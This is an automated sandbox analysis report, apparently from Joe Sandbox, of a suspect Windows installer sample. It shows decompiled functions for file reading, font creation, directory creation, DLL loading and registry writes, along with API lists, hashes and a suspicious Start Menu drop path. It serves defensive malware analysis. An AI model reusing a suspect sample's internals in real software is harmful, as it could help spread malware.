                                                      • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                      • Part of subcall function 00405371: lstrcatW.KERNEL32(00422708,00402EAD), ref: 004053CC
                                                      • Part of subcall function 00405371: SetWindowTextW.USER32(00422708,00422708), ref: 004053DE
                                                      • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                      • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                      • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsg51C2.tmp$C:\Users\user\AppData\Local\Temp\nsg51C2.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac$Call
                                                    • API String ID: 1941528284-3441966960
                                                    • Opcode ID: 4b4fd6f5ecf2900afcae32528c4112f55eb1a5073c8ee7446931cab05ab2727e
                                                    • Instruction ID: 0d28a5e8dae66ca407d9ab1903032e249cf50254bac70f3abe216f7737186e0f
                                                    • Opcode Fuzzy Hash: 4b4fd6f5ecf2900afcae32528c4112f55eb1a5073c8ee7446931cab05ab2727e
                                                    • Instruction Fuzzy Hash: 0541B131900119BACF217BA5CD45DAF3A79EF01368B20427FF422B10E1DB3C8A519A6E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402660 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1338 402660-402679 call 402c31 1341 402adb-402ade 1338->1341 1342 40267f-402686 1338->1342 1345 402ae4-402aea 1341->1345 1343 402688 1342->1343 1344 40268b-40268e 1342->1344 1343->1344 1346 4027f2-4027fa 1344->1346 1347 402694-4026a3 call 406172 1344->1347 1346->1341 1347->1346 1351 4026a9 1347->1351 1352 4026af-4026b3 1351->1352 1353 402748-40274b 1352->1353 1354 4026b9-4026d4 ReadFile 1352->1354 1355 402763-402773 call 405e6a 1353->1355 1356 40274d-402750 1353->1356 1354->1346 1357 4026da-4026df 1354->1357 1355->1346 1367 402775 1355->1367 1356->1355 1358 402752-40275d call 405ec8 1356->1358 1357->1346 1360 4026e5-4026f3 1357->1360 1358->1346 1358->1355 1363 4026f9-40270b MultiByteToWideChar 1360->1363 1364 4027ae-4027ba call 406159 1360->1364 1363->1367 1368 40270d-402710 1363->1368 1364->1345 1370 402778-40277b 1367->1370 1371 402712-40271d 1368->1371 1370->1364 1372 40277d-402782 1370->1372 1371->1370 1373 40271f-402744 SetFilePointer MultiByteToWideChar 1371->1373 1375 402784-402789 1372->1375 1376 4027bf-4027c3 1372->1376 1373->1371 1374 402746 1373->1374 1374->1367 1375->1376 1379 40278b-40279e 1375->1379 1377 4027e0-4027ec SetFilePointer 1376->1377 1378 4027c5-4027c9 1376->1378 1377->1346 1380 4027d1-4027de 1378->1380 1381 4027cb-4027cf 1378->1381 1379->1346 1382 4027a0-4027a6 1379->1382 1380->1346 1381->1377 1381->1380 1382->1352 1383 4027ac 1382->1383 1383->1346
                                                    C-Code - Quality: 83%
                                                    			E00402660(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C31(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x50)) = _t72;
				 *((intOrPtr*)(_t76 - 0x38)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2c8 =  *0x42a2c8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x38) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E00406172(__ecx, __esi);
						if( *(__ebp - 0x38) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405EC8( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405E6A( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406159( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
														__ebp - 0x44 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x44, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x38));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                    0x00402660
                                                    0x00402662
                                                    0x00402665
                                                    0x00402667
                                                    0x0040266a
                                                    0x0040266f
                                                    0x00402673
                                                    0x00402676
                                                    0x00402679
                                                    0x00402adb
                                                    0x00402ade
                                                    0x0040267f
                                                    0x0040267f
                                                    0x00402686
                                                    0x00402688
                                                    0x00402688
                                                    0x0040268e
                                                    0x004027f2
                                                    0x004027f2
                                                    0x004027f5
                                                    0x004027fa
                                                    0x004015b6
                                                    0x004028a1
                                                    0x004028a1
                                                    0x00000000
                                                    0x00402694
                                                    0x00402695
                                                    0x004026a0
                                                    0x004026a3
                                                    0x004026af
                                                    0x004026b3
                                                    0x0040274b
                                                    0x00402763
                                                    0x00402773
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004026b9
                                                    0x004026b9
                                                    0x004026bc
                                                    0x004026bd
                                                    0x004026c0
                                                    0x004026c5
                                                    0x004026cc
                                                    0x004026d4
                                                    0x00000000
                                                    0x004026da
                                                    0x004026da
                                                    0x004026df
                                                    0x00000000
                                                    0x004026e5
                                                    0x004026e5
                                                    0x004026ed
                                                    0x004026f0
                                                    0x004026f3
                                                    0x004027ae
                                                    0x004027b5
                                                    0x004026f9
                                                    0x004026ff
                                                    0x0040270b
                                                    0x00402775
                                                    0x00402775
                                                    0x0040270d
                                                    0x0040270d
                                                    0x00402710
                                                    0x00402712
                                                    0x00402712
                                                    0x00402712
                                                    0x00402715
                                                    0x0040271a
                                                    0x0040271d
                                                    0x00000000
                                                    0x00000000
                                                    0x0040271f
                                                    0x00402722
                                                    0x0040272a
                                                    0x00402736
                                                    0x00402744
                                                    0x00000000
                                                    0x00402746
                                                    0x00000000
                                                    0x00402746
                                                    0x00000000
                                                    0x00402744
                                                    0x00402712
                                                    0x00402778
                                                    0x0040277b
                                                    0x00000000
                                                    0x0040277d
                                                    0x00402782
                                                    0x004027c3
                                                    0x004027e5
                                                    0x004027ec
                                                    0x004027d1
                                                    0x004027d1
                                                    0x004027d4
                                                    0x004027d7
                                                    0x004027da
                                                    0x004027da
                                                    0x00000000
                                                    0x0040278b
                                                    0x0040278b
                                                    0x0040278e
                                                    0x00402791
                                                    0x00402797
                                                    0x0040279b
                                                    0x0040279e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040279e
                                                    0x00402782
                                                    0x0040277b
                                                    0x004026f3
                                                    0x004026df
                                                    0x004026d4
                                                    0x00000000
                                                    0x004027a0
                                                    0x004027a0
                                                    0x004027a3
                                                    0x004027ac
                                                    0x00000000
                                                    0x004026a3
                                                    0x0040268e
                                                    0x00402ae4
                                                    0x00402aea

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,?,?,?), ref: 004026CC
                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402707
                                                    • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402740
                                                      • Part of subcall function 00405EC8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EDE
                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                    • String ID: 9
                                                    • API String ID: 163830602-2366072709
                                                    • Opcode ID: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
                                                    • Instruction ID: cf5e27d2714951497ad0250a6e54f1fa2860b8b617eea02cda273725ea92b50b
                                                    • Opcode Fuzzy Hash: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
                                                    • Instruction Fuzzy Hash: B9511674900219AADF20DF94DE88AAEB7B9FF04304F50403BE941F72D1D7B89982DB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1384 401db3-401e3e GetDC call 402c31 GetDeviceCaps MulDiv ReleaseDC call 402c31 call 406234 CreateFontIndirectW 1391 4025a8 1384->1391 1392 4025a9 1391->1392 1392->1392
                                                    C-Code - Quality: 73%
                                                    			E00401DB3(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C31(2);
				 *((intOrPtr*)(_t35 - 0x50)) = _t30;
				0x40cde0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cdf0 = E00402C31(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x50)) = _t30;
				 *0x40cdf7 = 1;
				 *0x40cdf4 = _t15 & 0x00000001;
				 *0x40cdf5 = _t15 & 0x00000002;
				 *0x40cdf6 = _t15 & 0x00000004;
				E00406234(_t9, _t31, _t33, "Tahoma",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cde0); // executed
				_push(_t18);
				_push(_t33);
				E00406159();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                    0x00401db3
                                                    0x00401dbe
                                                    0x00401dc0
                                                    0x00401dcd
                                                    0x00401de4
                                                    0x00401de9
                                                    0x00401df6
                                                    0x00401dfb
                                                    0x00401dff
                                                    0x00401e0a
                                                    0x00401e11
                                                    0x00401e23
                                                    0x00401e29
                                                    0x00401e2e
                                                    0x00401e38
                                                    0x004025a8
                                                    0x0040156d
                                                    0x00402a81
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                    • GetDC.USER32(?), ref: 00401DB6
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                    • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                    • String ID: Tahoma
                                                    • API String ID: 3808545654-3580928618
                                                    • Opcode ID: e9dc967046a9833b494e13a4fbbc470b8de16a0e7eb7b9edd9fcccda2063d4ab
                                                    • Instruction ID: 65d3cf27749cc92dd64e462d7a068a1de8cb11dbe253a65c0e26eefc01b1c80e
                                                    • Opcode Fuzzy Hash: e9dc967046a9833b494e13a4fbbc470b8de16a0e7eb7b9edd9fcccda2063d4ab
                                                    • Instruction Fuzzy Hash: B8015271544245EFE7006BB4AF4AA9E7FB5BF55301F14097DE142BA1E2CBB80006AB2D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405840 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1393 405840-40588b CreateDirectoryW 1394 405891-40589e GetLastError 1393->1394 1395 40588d-40588f 1393->1395 1396 4058b8-4058ba 1394->1396 1397 4058a0-4058b4 SetFileSecurityW 1394->1397 1395->1396 1397->1395 1398 4058b6 GetLastError 1397->1398 1398->1396
                                                    C-Code - Quality: 100%
                                                    			E00405840(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                    0x0040584b
                                                    0x0040584f
                                                    0x00405852
                                                    0x00405858
                                                    0x0040585c
                                                    0x00405860
                                                    0x00405868
                                                    0x0040586f
                                                    0x00405875
                                                    0x0040587c
                                                    0x00405883
                                                    0x0040588b
                                                    0x0040588d
                                                    0x00000000
                                                    0x0040588d
                                                    0x00405897
                                                    0x0040589e
                                                    0x004058b4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004058b6
                                                    0x004058ba

                                                    APIs
                                                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
                                                    • GetLastError.KERNEL32 ref: 00405897
                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004058AC
                                                    • GetLastError.KERNEL32 ref: 004058B6
                                                    Strings
                                                    • C:\Users\user\Desktop, xrefs: 00405840
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405866
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                    • API String ID: 3449924974-26219170
                                                    • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                    • Instruction ID: cbd092c4ebd5e7b47652c6b2ce971f8280a433404df7830fbb595f789125ae90
                                                    • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                    • Instruction Fuzzy Hash: 43011A72D00619DAEF10EFA0C9447EFBBB8EF04344F00803AD944B6280E7789614CF99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040657C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1399 40657c-40659c GetSystemDirectoryW 1400 4065a0-4065a2 1399->1400 1401 40659e 1399->1401 1402 4065b3-4065b5 1400->1402 1403 4065a4-4065ad 1400->1403 1401->1400 1405 4065b6-4065e9 wsprintfW LoadLibraryExW 1402->1405 1403->1402 1404 4065af-4065b1 1403->1404 1404->1405
                                                    C-Code - Quality: 100%
                                                    			E0040657C(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                    0x00406593
                                                    0x0040659c
                                                    0x0040659e
                                                    0x0040659e
                                                    0x004065a2
                                                    0x004065b5
                                                    0x004065af
                                                    0x004065af
                                                    0x004065af
                                                    0x004065ce
                                                    0x004065e2
                                                    0x004065e9

                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
                                                    • wsprintfW.USER32 ref: 004065CE
                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004065E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                    • String ID: %s%S.dll$UXTHEME$\
                                                    • API String ID: 2200240437-1946221925
                                                    • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                    • Instruction ID: 5ba2db083709ae0eaf9cf6759a8f1877d4d75d4363d7664b3b34a8d65426c280
                                                    • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                    • Instruction Fuzzy Hash: 4AF0F670910219FADF10AB64EE0EF9B366CAB00304F50403AA546F11D0EB7CDA25CBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004023EA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73registrystringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1406 4023ea-402430 call 402d48 call 402c53 * 2 RegCreateKeyExW 1413 402436-40243e 1406->1413 1414 402adb-402aea 1406->1414 1416 402440-40244d call 402c53 lstrlenW 1413->1416 1417 402451-402454 1413->1417 1416->1417 1418 402456-402467 call 402c31 1417->1418 1419 402468-40246b 1417->1419 1418->1419 1423 40247c-402490 RegSetValueExW 1419->1423 1424 40246d-402477 call 40317b 1419->1424 1428 402492 1423->1428 1429 402495-402573 RegCloseKey 1423->1429 1424->1423 1428->1429 1429->1414 1431 4028a1-4028a8 1429->1431 1431->1414
                                                    C-Code - Quality: 86%
                                                    			E004023EA(void* __eax, intOrPtr __edx) {
				void* _t18;
				short* _t21;
				int _t22;
				long _t25;
				char _t27;
				int _t30;
				intOrPtr _t35;
				intOrPtr _t39;
				void* _t41;

				_t35 = __edx;
				_t18 = E00402D48(__eax);
				_t39 =  *((intOrPtr*)(_t41 - 0x18));
				 *(_t41 - 0x50) =  *(_t41 - 0x14);
				 *(_t41 - 0x38) = E00402C53(2);
				_t21 = E00402C53(0x11);
				_t34 =  *0x42a2f0 | 0x00000002;
				 *(_t41 - 4) = 1;
				_t22 = RegCreateKeyExW(_t18, _t21, _t30, _t30, _t30,  *0x42a2f0 | 0x00000002, _t30, _t41 + 8, _t30); // executed
				if(_t22 == 0) {
					if(_t39 == 1) {
						E00402C53(0x23);
						_t22 = lstrlenW(0x40b5d8) + _t29 + 2;
					}
					if(_t39 == 4) {
						_t27 = E00402C31(3);
						_pop(_t34);
						 *0x40b5d8 = _t27;
						 *((intOrPtr*)(_t41 - 0x30)) = _t35;
						_t22 = _t39;
					}
					if(_t39 == 3) {
						_t22 = E0040317B(_t34,  *((intOrPtr*)(_t41 - 0x1c)), _t30, 0x40b5d8, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t41 + 8),  *(_t41 - 0x38), _t30,  *(_t41 - 0x50), 0x40b5d8, _t22); // executed
					if(_t25 == 0) {
						 *(_t41 - 4) = _t30;
					}
					_push( *(_t41 + 8));
					RegCloseKey(); // executed
				}
				 *0x42a2c8 =  *0x42a2c8 +  *(_t41 - 4);
				return 0;
			}












                                                    0x004023ea
                                                    0x004023eb
                                                    0x004023f0
                                                    0x004023fa
                                                    0x00402404
                                                    0x00402407
                                                    0x00402417
                                                    0x00402421
                                                    0x00402428
                                                    0x00402430
                                                    0x0040243e
                                                    0x00402442
                                                    0x0040244d
                                                    0x0040244d
                                                    0x00402454
                                                    0x00402458
                                                    0x0040245d
                                                    0x0040245e
                                                    0x00402464
                                                    0x00402467
